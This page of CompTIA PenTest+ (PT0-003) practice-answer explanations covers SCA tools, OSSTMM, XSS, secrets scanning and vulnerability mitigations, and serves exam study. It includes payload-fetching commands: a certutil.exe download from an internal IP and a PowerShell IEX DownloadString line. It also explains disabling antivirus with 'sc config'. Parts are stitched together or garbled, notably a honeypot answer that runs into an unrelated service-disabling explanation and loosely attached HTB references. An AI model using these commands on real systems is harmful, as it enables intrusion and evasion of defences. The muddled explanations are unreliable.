Free Practice Questions for CompTIA PT0-003 Exam

Based on the findings, the focus should be on addressing vulnerabilities in libraries and ensuring their security. Here’s why options D and E are correct:

Implement an SCA Tool:

SCA (Software Composition Analysis) tools are designed to analyze and manage open-source components in an application. Implementing an SCA tool would help in identifying and managing vulnerabilities in libraries, aligning with the finding of vulnerable libraries in the secure SDLC process.

This recommendation addresses the high-risk finding related to the Secure SDLC by providing a systematic approach to manage and mitigate vulnerabilities in software dependencies.

Obtain the Latest Library Version:

Keeping libraries up to date is a fundamental practice in maintaining the security of an application. Ensuring that the latest, most secure versions of libraries are used directly addresses the high-risk finding related to vulnerable libraries.

This recommendation is a direct and immediate action to mitigate the identified vulnerabilities.

Other Options Analysis:

Develop a Secure Encryption Algorithm: This is not practical or necessary given that the issue is with the use of a weak algorithm, not the need to develop a new one.

Deploy an Asset Management System: While useful, this is not directly related to the identified high-risk issue of vulnerable libraries.

Write an SDLC Policy: While helpful, the more immediate and effective actions involve implementing tools and processes to manage and update libraries.

References from Pentest:

Horizontall HTB: Demonstrates the importance of managing software dependencies and using tools to identify and mitigate vulnerabilities in libraries​​.

Writeup HTB: Highlights the need for keeping libraries updated to ensure application security and mitigate risks​​.

Conclusion:

Options D and E, implementing an SCA tool and obtaining the latest library version, are the most appropriate recommendations to address the high-risk finding related to vulnerable libraries in the Secure SDLC process.

=================

The OSSTMM (Open Source Security Testing Methodology Manual) is a comprehensive framework for security testing that includes 14 components in its life cycle. Here’s why option B is correct:

OSSTMM: This methodology breaks down the security testing process into 14 components, covering various aspects of security assessment, from planning to execution and reporting.

OWASP MASVS: This is a framework for mobile application security verification and does not have a 14-component life cycle.

MITRE ATT&CK: This is a knowledge base of adversary tactics and techniques but does not describe a 14-component life cycle.

CREST: This is a certification body for penetration testers and security professionals but does not provide a specific 14-component framework.

References from Pentest:

Anubis HTB: Emphasizes the structured approach of OSSTMM in conducting comprehensive security assessments​​.

Writeup HTB: Highlights the use of detailed methodologies like OSSTMM to cover all aspects of security testing​​.

Conclusion:

Option B, OSSTMM, is the framework that breaks the life cycle into 14 components, making it the correct answer.

=================

Cross-Site Scripting (XSS) is an attack that involves injecting malicious scripts into web pages viewed by other users. Here’s why option C is correct:

XSS (Cross-Site Scripting): This attack involves injecting JavaScript into a web application, which is then executed by the user’s browser. The scenario describes injecting a JavaScript prompt, which is a typical XSS payload.

SQL Injection: This involves injecting SQL commands to manipulate the database and does not relate to JavaScript injection.

SSRF (Server-Side Request Forgery): This attack tricks the server into making requests to unintended locations, which is not related to client-side JavaScript execution.

Server-Side Template Injection: This involves injecting code into server-side templates, not JavaScript that executes in the user’s browser.

References from Pentest:

Horizontall HTB: Demonstrates identifying and exploiting XSS vulnerabilities in web applications​​.

Luke HTB: Highlights the process of testing for XSS by injecting scripts and observing their execution in the browser​​.

=================

To execute a payload and gain additional access, the penetration tester should use certutil.exe. Here’s why:

Using certutil.exe:

Purpose: certutil.exe is a built-in Windows utility that can be used to download files from a remote server, making it useful for fetching and executing payloads.

Command: certutil.exe -f https://192.168.0.1/foo.exe bad.exe downloads the file foo.exe from the specified URL and saves it as bad.exe.

Comparison with Other Commands:

powershell.exe impo C:\tools\foo.ps1 (A): Incorrect syntax and not as direct as using certutil for downloading files.

powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/ ") (C): Incorrect syntax for downloading and executing a script.

rundll32.exe c:\path\foo.dll,functName (D): Used for executing DLLs, not suitable for downloading a payload.

Using certutil.exe to download and execute a payload is a common and effective method.

=================

A honeypot is a decoy system designed to attract attackers by exposing multiple services and vulnerabilities.

Indicators of a honeypot (Option A):

The system has an unusual combination of Windows (SMB, MSRPC) and Linux (Rsync, SSH) services.

It exposes a large number of open ports, which is uncommon for a production server.

Presence of "zeus-admin" (port 9090) suggests intentionally vulnerable services.

Command Explanation:

The sc config command is used to configure service startup settings in Windows. Using start=disabled will permanently disable a specific service, effectively turning off protections such as antivirus or other monitoring services.

Why Not Other Options?

B (sc query state= all): This command lists all services and their states but does not disable or modify any service.

C (pskill): This command is used to terminate a process temporarily, but it does not permanently disable the service.

D (net config): This command is used for configuring network settings, not for managing services.

CompTIA Pentest+ References:

Domain 3.0 (Attacks and Exploits)

Windows Service Exploitation Guidelines

Penetration testers search for hardcoded credentials, API keys, and authentication tokens in source code repositories to identify secrets leakage.

Secrets scanning (Option B):

The find and egrep command scans all files recursively for sensitive keywords like "token," "key," and "login".

Attackers use tools like TruffleHog and GitLeaks to automate secret discovery.

1. Reflected XSS - Input sanitization (<> ...)

2. Sql Injection Stacked - Parameterized Queries

3. DOM XSS - Input Sanitization (<> ...)

4. Local File Inclusion - sandbox req

5. Command Injection - sandbox req

6. SQLi union - paramtrized queries

7. SQLi error - paramtrized queries

8. Remote File Inclusion - sandbox

9. Command Injection - input saniti $

10. URL redirect - prevent external calls